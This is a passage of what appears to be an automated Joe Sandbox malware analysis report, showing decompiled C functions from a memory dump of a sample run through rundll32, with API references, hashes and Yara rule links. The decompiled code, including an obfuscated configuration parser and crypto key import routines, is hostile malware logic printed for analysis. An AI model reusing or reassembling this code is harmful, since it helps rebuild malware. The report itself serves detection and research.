				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x45e9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x045e407a
0x045e4087
0x045e4089
0x045e408a
0x045e4092
0x045e4092
0x045e4096
0x00000000
0x00000000
0x045e408d
0x045e408e
0x045e4091
0x045e4091
0x045e409e
0x045e40a3
0x045e40a8
0x045e40b0
0x045e40b6
0x045e40b8
0x045e40bb
0x045e40bf
0x045e40c1
0x045e40c4
0x045e40c4
0x045e40c5
0x045e40c7
0x045e40c4
0x045e40d1
0x045e40d4
0x045e40d7
0x045e40d8
0x045e40da
0x045e40e1
0x045e40e1
0x045e40ed

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04FF95FC,?,?,045E3DCB,?,04FF95FC), ref: 045E4092
StrTrimA.SHLWAPI(?,045E9278,00000002,?,045E3DCB,?,04FF95FC), ref: 045E40B0
StrChrA.SHLWAPI(?,00000020,?,045E3DCB,?,04FF95FC), ref: 045E40BB

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: f6bfe1d104626a44582eefd33749a27bb4cb3a260c991a5f6ae478a4d1c73ba6
Instruction ID: 3f1c8348b89c255d4fc1e9a09b53dda46f0eb4d67d1f4128846348b2ff0fcf80
Opcode Fuzzy Hash: f6bfe1d104626a44582eefd33749a27bb4cb3a260c991a5f6ae478a4d1c73ba6
Instruction Fuzzy Hash: A6017176300346AFEB184E2B9C48F777B9DFBC6350F444425AA55CF283DA71E841E660

Uniqueness

Uniqueness Score: -1.00%

Function 045E789E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E789E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x45ea2d8, 0, _a4); // executed
				return _t2;
			}

0x045e78aa
0x045e78b0

APIs

RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

Strings

Uqt, xrefs: 045E78AA

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 358b349c2e9b8fa30ed5ec6669cff5edf478ac84020740f49d9e6ca71dadef77
Instruction ID: de848e6ee1815b1501267d2af1c2551993574a3671934dc4792ea89cb977680f
Opcode Fuzzy Hash: 358b349c2e9b8fa30ed5ec6669cff5edf478ac84020740f49d9e6ca71dadef77
Instruction Fuzzy Hash: B7B012F1200300ABCB154B13DE04F097A21F790700F004010B3041807182360C24FB15

Uniqueness

Uniqueness Score: -1.00%

Function 045E4BD5 Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E045E4BD5(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E045E2689(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x45ea348; // 0xa0d5a8
						_t20 = _t68 + 0x45eb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E045E1061(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x045e4bdb
0x045e4bde
0x045e4bee
0x045e4bf7
0x045e4bfb
0x045e4cc9
0x045e4ccf
0x045e4ccf
0x045e4c15
0x045e4c1a
0x045e4c1e
0x045e4c24
0x045e4c29
0x045e4c30
0x045e4c3f
0x045e4c3f
0x045e4c43
0x045e4c45
0x045e4c51
0x045e4c5c
0x045e4c67
0x045e4c6b
0x045e4c75
0x045e4c79
0x045e4c7b
0x045e4c80
0x045e4c87
0x045e4c97
0x045e4c97
0x045e4c80
0x045e4c79
0x045e4c99
0x045e4c9e
0x045e4ca3
0x045e4ca3
0x045e4ca6
0x045e4caf
0x045e4cb4
0x045e4cb4
0x045e4cb9
0x045e4cbe
0x045e4cbe
0x045e4cb9
0x045e4c43
0x045e4cc0
0x045e4cc6
0x00000000

APIs

Part of subcall function 045E2689: SysAllocString.OLEAUT32(80000002), ref: 045E26E6
Part of subcall function 045E2689: SysFreeString.OLEAUT32(00000000), ref: 045E274C

SysFreeString.OLEAUT32(?), ref: 045E4CB4
SysFreeString.OLEAUT32(045E23DF), ref: 045E4CBE

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 10c60532c981583033f5c47a5e01295f66c1aaa4323912c28d6ee4c1e0b7bf21
Instruction ID: cceb4e858dd7017c031635966d36d84c787a77557cc2221a146ea7c15c925013
Opcode Fuzzy Hash: 10c60532c981583033f5c47a5e01295f66c1aaa4323912c28d6ee4c1e0b7bf21
Instruction Fuzzy Hash: 31315A71500119EFCB19DFA6D888CAFBB79FFCA7407154A58F8099B210D632AD51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 045E3A53 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E3A53(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E045E78B3(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x45ea2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E045E5BB5(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x045e3a53
0x045e3a5b
0x045e3a72
0x045e3a8d
0x045e3a91
0x045e3a96
0x045e3a98
0x045e3aaa
0x045e3ab6
0x045e3a9a
0x045e3a9a
0x045e3a9f
0x045e3aa4
0x045e3aa4
0x045e3a98
0x045e3abc
0x045e3ac0
0x045e3ac0
0x045e3a67
0x045e3a6c
0x045e3a70
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 045E5BB5: SysFreeString.OLEAUT32(00000000), ref: 045E5C18

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,045E623B,?,004F0053,04FF93D8,00000000,?), ref: 045E3AB6

Strings

Uqt, xrefs: 045E3AB6

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Free$HeapString
String ID: Uqt
API String ID: 3806048269-2320327147
Opcode ID: 78e4828ad916545245f87a4592db4fa1a729a293a4913f7270671476b8f51eea
Instruction ID: 2bc17bafa84c16703615b8d5b5b81f3c62f120ff7d55bfb3db93e80ff631a772
Opcode Fuzzy Hash: 78e4828ad916545245f87a4592db4fa1a729a293a4913f7270671476b8f51eea
Instruction Fuzzy Hash: CB012C32500619BBDB269F96DC00EAA3B6AFF44750F448018FE059B220D771E964FBD0

Uniqueness

Uniqueness Score: -1.00%

Function 045E3DE0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E045E3DE0(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E045E7A71(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E045E789E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x045e3de5
0x045e3df0
0x045e3df2
0x045e3df8
0x045e3dfa
0x045e3dff
0x045e3e08
0x045e3e0c
0x045e3e15
0x045e3e19
0x045e3e28
0x045e3e1b
0x045e3e1c
0x045e3e21
0x045e3e21
0x045e3e19
0x045e3e0c
0x045e3e31

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,045E3730,00000000,00000000,?,775EC740,045E3730), ref: 045E3DF8

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

GetComputerNameExA.KERNEL32(00000003,00000000,045E3730,045E3731,?,775EC740,045E3730), ref: 045E3E15

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 927b2d1653d1b17fd10c94f0a8e4222a83f417b33f4b7498c823dd0eec49fa6f
Instruction ID: 4347ac7b86fe8f540fb533b742863f9241f3b3bfca91a9bd673272705c6f0410
Opcode Fuzzy Hash: 927b2d1653d1b17fd10c94f0a8e4222a83f417b33f4b7498c823dd0eec49fa6f
Instruction Fuzzy Hash: 58F05E7660010ABAEB15D6ABDD01EBF77FDEBC9650F2500A9B904D7140EAB0EF01A670

Uniqueness

Uniqueness Score: -1.00%

Function 045E72C0 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E72C0(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x45ea2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x45ea1c8 = GetTickCount();
				_t5 = E045E2D54(_a4);
				if(_t5 == 0) {
					_t5 = E045E2CEC(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E045E534A(_t9) != 0) {
							 *0x45ea300 = 1; // executed
						}
						_t7 = E045E10AD(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x045e72c0
0x045e72c9
0x045e72cf
0x045e72d6
0x045e72da
0x00000000
0x045e72da
0x045e72e7
0x045e72ec
0x045e72f3
0x045e72f9
0x045e7300
0x045e7309
0x045e730b
0x045e730b
0x045e7315
0x00000000
0x045e7315
0x045e7300
0x045e731a

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,045E3930,?), ref: 045E72C9
GetTickCount.KERNEL32 ref: 045E72DD

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 2435ad4dc724d0465925edf69bf1d5bc95164dcb5281fedc02021dbbb2379e0b
Instruction ID: 9224317ee2efde9c59fc72daaa158c2143cbe9c34f7654f36616585bb3dcdb78
Opcode Fuzzy Hash: 2435ad4dc724d0465925edf69bf1d5bc95164dcb5281fedc02021dbbb2379e0b
Instruction Fuzzy Hash: 89F06D70644302AAEB9C6F73ED047393698BB4C709F504835FD40D8082FB75F804B625

Uniqueness

Uniqueness Score: -1.00%

Function 045E5D05 Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E5D05(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x45ea368; // 0x4ff9668
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E045E7571( &_v68) == 0) {
						goto L16;
					}
					_t30 = E045E2C73(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E045E4F4B(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E045EA000 = E045EA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E045E70E7( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x45ea30c, 0) == 0x102);
				return _t30;
			}

0x045e5d05
0x045e5d0b
0x045e5d12
0x045e5d1a
0x045e5d20
0x045e5d23
0x045e5d25
0x045e5d25
0x045e5d2d
0x045e5d2d
0x045e5d37
0x00000000
0x00000000
0x045e5d46
0x045e5d4a
0x045e5d4e
0x045e5d53
0x045e5d57
0x045e5d93
0x045e5d95
0x045e5d95
0x045e5d59
0x045e5d60
0x045e5d8a
0x045e5d62
0x045e5d62
0x045e5d67
0x045e5d83
0x045e5d69
0x045e5d69
0x045e5d6e
0x045e5d73
0x045e5d76
0x045e5d78
0x045e5d7d
0x045e5d7f
0x045e5d7f
0x045e5d7d
0x045e5d6e
0x045e5d67
0x045e5d60
0x045e5d57
0x045e5da2
0x045e5da7
0x045e5da7
0x045e5dcb

APIs

WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 045E5DB7

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: cfccfa7afb695f492bd9350e035ee9f3bb82967c2c98df1e23547b6a2a9dac7e
Instruction ID: 5f0d2935d27060c1752b4378bac7a14fe1b3f8f7ac177ef438f879522a33769b
Opcode Fuzzy Hash: cfccfa7afb695f492bd9350e035ee9f3bb82967c2c98df1e23547b6a2a9dac7e
Instruction Fuzzy Hash: 5B21963170020EBBDB1A9EA7E98477E37B6FB84358F144425E4029B240F774EE45A750

Uniqueness

Uniqueness Score: -1.00%

Function 045E5BB5 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E045E5BB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x45ea348; // 0xa0d5a8
				_t4 = _t15 + 0x45eb3a0; // 0x4ff8948
				_t20 = _t4;
				_t6 = _t15 + 0x45eb124; // 0x650047
				_t17 = E045E4BD5(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E045E1D63(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x045e5bbf
0x045e5bc6
0x045e5bc7
0x045e5bc8
0x045e5bc9
0x045e5bcf
0x045e5bd4
0x045e5bd4
0x045e5bde
0x045e5bf0
0x045e5bf7
0x045e5c25
0x045e5bf9
0x045e5bfb
0x045e5c00
0x045e5c22
0x045e5c02
0x045e5c05
0x045e5c0c
0x045e5c11
0x045e5c13
0x045e5c13
0x045e5c18
0x045e5c18
0x045e5c00
0x045e5c2c

APIs

Part of subcall function 045E4BD5: SysFreeString.OLEAUT32(?), ref: 045E4CB4

Part of subcall function 045E1D63: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,045E6189,004F0053,00000000,?), ref: 045E1D6C
Part of subcall function 045E1D63: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,045E6189,004F0053,00000000,?), ref: 045E1D96
Part of subcall function 045E1D63: memset.NTDLL ref: 045E1DAA

SysFreeString.OLEAUT32(00000000), ref: 045E5C18

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 478386418ef00b400cd4309a5a522dc324a623818c16629a6cf96637c4324bd8
Instruction ID: 21536330d07350d206647c91857dd3afb33ed013fbeec7b4b7dea9b9c0c547dc
Opcode Fuzzy Hash: 478386418ef00b400cd4309a5a522dc324a623818c16629a6cf96637c4324bd8
Instruction Fuzzy Hash: 97019A3250051ABFDF19AFABCC40EBABBF8FB48254F404825E905A7060E370A911EB90

Uniqueness

Uniqueness Score: -1.00%

Function 045E44D8 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E045E44D8(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E045E47E5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E045E7A71(_a8 + _a8);
					if(_t21 != 0) {
						E045E4456(_a4, _t21, _t23);
					}
					E045E789E(_a4);
				}
				return _t21;
			}

0x045e44e0
0x045e44e7
0x045e44e9
0x045e44f8
0x045e44ff
0x045e450e
0x045e4512
0x045e4519
0x045e4519
0x045e4521
0x045e4526
0x045e452b

APIs

lstrlen.KERNEL32(00000000,00000000,045E3831,00000000,?,045E22E5,00000000,045E3831,?,775EC740,045E3831,00000000,04FF9600), ref: 045E44E9

Part of subcall function 045E47E5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,045E44FD,00000001,045E3831,00000000), ref: 045E481D
Part of subcall function 045E47E5: memcpy.NTDLL(045E44FD,045E3831,00000010,?,?,?,045E44FD,00000001,045E3831,00000000,?,045E22E5,00000000,045E3831,?,775EC740), ref: 045E4836
Part of subcall function 045E47E5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 045E485F
Part of subcall function 045E47E5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 045E4877
Part of subcall function 045E47E5: memcpy.NTDLL(00000000,775EC740,04FF9600,00000010), ref: 045E48C9

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: c90719ae54ddcd66f674de7fbf8a4d1b6af9b8802ff3270cb2f58eede47a3d04
Instruction ID: 81a09e26ba6675e22341f2f1a0e1b2e2a9f91e786e58f399abd5d8f790d12060
Opcode Fuzzy Hash: c90719ae54ddcd66f674de7fbf8a4d1b6af9b8802ff3270cb2f58eede47a3d04
Instruction Fuzzy Hash: 0DF0D0761005097BDF15AE56DD00DFA3BAEFFCA2A4B018026FD198A110DA71E655A7A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 045E2792 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E045E2792(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x45ea344; // 0x69b25f44
				if(E045E1696( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x45ea374 = _v8;
				}
				_t33 =  *0x45ea344; // 0x69b25f44
				if(E045E1696( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x45ea344; // 0x69b25f44
				_push(_t115);
				if(E045E1696( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x45ea2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x45ea344; // 0x69b25f44
						_t45 = E045E2A59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x45ea2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x45ea344; // 0x69b25f44
						_t46 = E045E2A59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x45ea2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x45ea344; // 0x69b25f44
						_t47 = E045E2A59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x45ea2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x45ea344; // 0x69b25f44
						_t48 = E045E2A59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x45ea004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x45ea344; // 0x69b25f44
